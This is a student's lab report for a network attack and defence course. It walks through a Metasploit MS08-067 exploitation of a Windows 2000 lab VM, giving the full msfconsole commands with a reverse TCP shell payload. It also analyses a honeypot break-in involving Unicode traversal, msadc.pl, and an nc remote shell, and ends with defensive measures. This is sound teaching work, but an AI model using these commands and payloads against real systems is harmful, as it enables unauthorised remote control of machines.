20231901 2023-2024-2 《网络攻防实践》第六周作业

20231901 黄丁韫 2023-2024-2 《网络攻防实践》第六周作业

1.第一部分

1.1实践内容

（1）动手实践Metasploit windows attacker

• 任务：使用metasploit软件进行windows远程渗透统计实验

• 具体任务内容：使用windows Attacker/BT4攻击机尝试对windows Metasploitable靶机上的MS08-067漏洞进行远程渗透攻击，获取目标主机的访问权

（2）取证分析实践：解码一次成功的NT系统破解攻击。

• 来自212.116.251.162的攻击者成功攻陷了一台由rfp部署的蜜罐主机172.16.1.106,(主机名为lab.wiretrip.net)，要求提取并分析攻击的全部过程。
• 攻击者使用了什么破解工具进行攻击
• 攻击者如何使用这个破解工具进入并控制了系统
• 攻击者获得系统访问权限后做了什么
• 我们如何防止这样的攻击
• 你觉得攻击者是否警觉了他的目标是一台蜜罐主机？如果是，为什么
  （3）团队对抗实践：windows系统远程渗透攻击和分析。
• 攻方使用metasploit选择漏洞进行攻击，获得控制权。（要求写出攻击方的同学信息、使用漏洞、相关IP地址等）
• 防守方使用wireshark监听获得的网络数据包，分析攻击过程，获取相关信息。

1.2实验过程

1.2.1 利用MS08-067漏洞，通过metasploit软件对windows靶机实施远程渗透

• 本次使用kali虚拟机进行实验，首先进入控制台，输入代码msfconsole
  
• 查找要使用的漏洞对应的模块，输入指令search ms08_067，可以看到对应编号是0，因此，info 0即可查看靶机适用范围，use 0即可使用该模块。
  
• 继续，查看靶机使用范围，输入指令info 0，如下图，我们可以发现这个漏洞适用在Windows，Win2k。因此，可以利用该漏洞对靶机Win2实施渗透攻击。（注意：靶机ip还未进行配置，默认端口号445）
  
• 开始使用该漏洞模块，输入指令 use 0，再查看可用载荷，输入指令show payloads，
  
• 这里我们选择攻击载荷，反向tcp连接，也就是进行主动攻击，输入命令set payload generic/shell_reverse_tcp
  
• 然后再查看需要配置的参数，输入指令show options
  
• 配置相应参数，可以看到攻击机的地址为：192.168.32.3，靶机的地址为：192.168.32.131
  
  
• 这里的话，只需配置靶机ip即可，输入命令set RHOST 192.168.32.131，再次查看配置参数，可以看到配置成功。
  
• 设置完毕，可以开始渗透攻击了，输入命令，exploit，可以看到成功获取到靶机访问权。
  

1.2.2 取证分析实践：解码一次成功的NT系统破解攻击

(1)攻击者使用了什么破解工具进行攻击

• 问题解答 ：攻击者利用了Unicode攻击（针对MS00-078/MS01-026）和针对msadcs.dll中RDS漏洞（MS02-065）的msadc.pl/msadc2.pl 渗透攻击工具进行了攻击。

• 分析 ：

• 打开log文件，筛选有用信息进行分析，输入ip.addr ==172.16.1.106 and http
  

• 跟踪数据包的tcp数据流，如下图可知，存在特殊字符%C0%AF，这是Unicode编码，由此判断攻击者进行了Unicode攻击以打开boot.ini文件。因此，存在Unicode漏洞攻击。
  

• 存在shell语句和"ADM!ROX!YOUR!WORLD"，百度可知，这是RDS漏洞。
  (2)攻击者如何使用这个破解工具进入并控制了系统

• 回答： 如下图所示，可以观察到RDS渗透攻击的间隔时间大约为6秒，推测攻击者预先编写了一系列需要执行的shell指令，并使用msadc(2).pl渗透工具一次执行。然而，攻击并未成功，随后攻击者转向Unicode攻击。在Unicode攻击中，每个请求的间隔时间约为10-12秒，这表明指令可能是手动输入的。一旦攻击者成功进入系统，注意到他们建立了一个FTP连接。然而，请求的间隔时间仍然约为10-12秒，这表明这些指令可能是由攻击者手动输入的。
  

• 连接至 213.116.251.162 的蜜罐主机已下载了所指定的文件，并使用nc建立了与其的远程shell通道。随后，攻击者连接到6969端口，取得了访问权限，然后进入了交互式控制阶段。
  
  （3）攻击者获得系统访问权限后做了什么
  答：由下图中可以看到，tcp流可以看到攻击者的行为：
  

• 对目标主机的文件系统进行了嗅探并删除了一些文件：
  - 最后，通过试图删除SAM数据库中的数据（拷贝和删除har.txt）和将自己加到管理员组中的方式来实现提升自己访问权限的目的。
  （4）我们如何防止这样的攻击
  这样的攻击主要是RDS漏洞攻击和Unicode漏洞攻击。
  防止的方法有如下几中：

• 限制网络用户访问和调用CMD命令的权限；

• 若没必要使用SCRIPTS和MSADC目录，删除或改名；

• 安装windows NT系统时不要使用默认WINNT路径，您可以改为其他的文件夹，如C:\mywindowsnt；

• 用户可从如下地址下载Microsoft提供的补丁：t.asp为IIS 4.0的补丁地址，.asp为IIS 5.0补丁地址；

• 通过移除或删除系统内/msadc目录，同时移除c:\Program Files\Common Files\System\Msadc\msadcs.dll，或安装MDAC 2.1 SP2补丁，并注意及时上网更新。

（5）你觉得攻击者是否警觉了他的目标是一台蜜罐主机？如果是，为什么？

追踪TCP流就可以看到一行字"rfp。txt"，可以得知攻击者已经知道这是一台蜜罐主机。

1.2.3 团队对抗实践：windows系统远程渗透攻击和分析

• 实验环境，改为桥接模式，两人连接同一局域网

• 攻击状态：
• 攻击机Kali：192.168.1.105 （黄丁韫）
• 靶机Win2k：192.168.1.104 （周幸妤）
• 依照任务一步骤，攻击靶机，输入如下指令

msfconsole
search ms08_067
use 0 //选择攻击模块
set payload generic/shell_reverse_tcp //选择攻击载荷
show options //查看配置信息
set RHOST 192.168.1.104 //设置靶机IP，端口默认为445
exploit

• 可以看到成功获得靶机访问权
  
• 创建文件，输入内容

mkdir 20223901hdy //创建文件夹
cd 20231901hdy //进入新创建的文件夹
echo hello, zhouxingyu. >>20231901.txt

• 在靶机中可以看到，文件创建成功， 并且内容正确。
  
  

防御状态，对攻击过程中捕获的包进行分析：

• 追踪其tcp流可以看到，攻击机对靶机执行的所有shell命令。：
  

2.遇到的问题及解决

问题1：利用ms08-067入侵靶机，获取控制权时，遇到Exploit completed, but no session was created，

问题1解决方案：经过网络查阅，得出以下解决方法：
1.如果未设置targets，Metaexploit会使用默认的Exploit Target 0
此时要根据靶机版本选择合适的targets，例如这里是靶机系统为：Windows 2000，则只需加一行如下命令set target 1，如果还是不行，可以把靶机改成英文版。
问题2：改成桥接模式时显示无网络。

问题2解决方案：重启或者挂载再运行虚拟机，如果切换了网络，其ip地址不改变也需要重新挂载。

3.学习感悟、思考等

本次实验，我对MSF模块有了一个更深的理解。并且对于利用特定漏洞获取控制权有了一定的了解。
具体过程可以分为:首先就是查找相关漏洞名，然后根据漏洞名选取相应模块，在查看模块所需参数，进行相关参数配置，exploit就可以等待靶机上钩了。最后对于虚拟机的网络连接有了一个更新的认识，通过局域网如何实现虚拟机的相互通信等等。

4.参考资料

渗透测试实例
SMB协议(445)
参考书：《网络攻防技术与实现》